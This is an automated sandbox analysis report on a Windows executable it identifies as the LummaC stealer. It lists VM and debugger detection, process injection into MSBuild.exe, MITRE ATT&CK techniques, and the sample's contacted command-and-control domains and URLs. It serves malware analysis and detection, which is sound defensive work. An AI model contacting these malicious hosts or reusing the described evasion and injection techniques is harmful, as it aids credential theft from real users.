Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe

API coverage: 4.2 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4016

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Code function: 0_2_00ED9ABF FindFirstFileExW,

0_2_00ED9ABF

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2127941885.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00445BB0 LdrInitializeThunk,

2_2_00445BB0

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Code function: 0_2_00EC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EC7922

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC2003 mov edi, dword ptr fs:[00000030h]	0_2_00EC2003
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EDA64C mov eax, dword ptr fs:[00000030h]	0_2_00EDA64C
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ED0F2E mov ecx, dword ptr fs:[00000030h]	0_2_00ED0F2E

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Code function: 0_2_00EDCC4B GetProcessHeap,

0_2_00EDCC4B

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EC7610
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EC7922
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00EC7AAF SetUnhandledExceptionFilter,	0_2_00EC7AAF
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: 0_2_00ECDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ECDA73

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: TuQlz67byH.exe	String found in binary or memory: frizzettei.sbs
Source: TuQlz67byH.exe	String found in binary or memory: isoplethui.sbs
Source: TuQlz67byH.exe	String found in binary or memory: exemplarou.sbs
Source: TuQlz67byH.exe	String found in binary or memory: invinjurhey.sbs
Source: TuQlz67byH.exe	String found in binary or memory: wickedneatr.sbs
Source: TuQlz67byH.exe	String found in binary or memory: exilepolsiy.sbs
Source: TuQlz67byH.exe	String found in binary or memory: laddyirekyi.sbs
Source: TuQlz67byH.exe	String found in binary or memory: bemuzzeki.sbs

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 745008	Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior

Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_00EDC085
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetLocaleInfoW,	0_2_00ED622B
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: EnumSystemLocalesW,	0_2_00EDC372
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: EnumSystemLocalesW,	0_2_00EDC327
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EDC498
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: EnumSystemLocalesW,	0_2_00EDC40D
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetLocaleInfoW,	0_2_00EDC6EB
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00EDC814
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EDC9E9
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: GetLocaleInfoW,	0_2_00EDC91A
Source: C:\Users\user\Desktop\TuQlz67byH.exe	Code function: EnumSystemLocalesW,	0_2_00ED5D7F

Source: C:\Users\user\Desktop\TuQlz67byH.exe

Code function: 0_2_00EC7815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EC7815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TuQlz67byH.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TuQlz67byH.exe.ec0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	41 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TuQlz67byH.exe	100%	Avira	HEUR/AGEN.1310458
TuQlz67byH.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
s-part-0044.t-0009.fb-t-msedge.net	13.107.253.72	true	false	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
sergei-esenin.com	104.21.53.8	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
frizzettei.sbs	unknown	unknown	true	unknown
laddyirekyi.sbs	unknown	unknown	true	unknown
wickedneatr.sbs	unknown	unknown	true	unknown
bemuzzeki.sbs	unknown	unknown	true	unknown
invinjurhey.sbs	unknown	unknown	true	unknown
isoplethui.sbs	unknown	unknown	true	unknown
exilepolsiy.sbs	unknown	unknown	true	unknown
exemplarou.sbs	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
frizzettei.sbs	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
invinjurhey.sbs	true		unknown
exilepolsiy.sbs	true		unknown
laddyirekyi.sbs	true		unknown
isoplethui.sbs	true		unknown
bemuzzeki.sbs	true		unknown
exemplarou.sbs	true		unknown
wickedneatr.sbs	true		unknown
https://sergei-esenin.com/api	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://store.steampowered.com/privacy_agreement/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/	MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com:443/apifiles/76561199724331900	MSBuild.exe, 00000002.00000002.2127941885.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/q	MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sergei-esenin.com/r	MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://sergei-esenin.com/b	MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/account/cookiepreferences/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/badges	MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States		13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528303
Start date and time:	2024-10-07 18:46:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TuQlz67byH.exe renamed because original name is a hash value
Original Sample Name:	8e704acd1b0c26fdcfd0374d57fcb28e.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/5@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 67% Number of executed functions: 11 Number of non-executed functions: 175
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.4, 20.190.159.71, 20.190.159.2, 20.190.159.23, 40.126.31.69, 20.190.159.0, 20.190.159.75, 40.126.31.73, 192.229.221.95, 20.42.73.29, 199.232.210.172, 40.113.110.67, 20.109.210.53, 40.69.42.241, 20.3.187.198, 40.115.3.253
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, onedsblobprdeus15.eastus.cloudapp.azure.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, client.wns.windows.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: TuQlz67byH.exe

Simulations

Behavior and APIs

Time	Type	Description
12:47:21	API Interceptor	3x Sleep call for process: MSBuild.exe modified
12:47:24	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.8	file.exe	Get hash	malicious	LummaC	Browse
	c3KH2gLNrM.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	8ObkdHP9Hq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	fASbbWNgm1.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Launch.exe	Get hash	malicious	LummaC	Browse
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sergei-esenin.com	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	xwZfYpo16i.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc	Browse	172.67.206.204
	c3KH2gLNrM.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	p7SnjaA8NN.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	172.67.206.204
bg.microsoft.map.fastly.net	f1r6P3j3g7.exe	Get hash	malicious	LummaC, Vidar	Browse	199.232.214.172
	lCVFGKfczi.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	199.232.214.172
	NdSXVNeoET.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.210.172
	vEcIHT68pU.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	file.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	Stealc	Browse	199.232.210.172
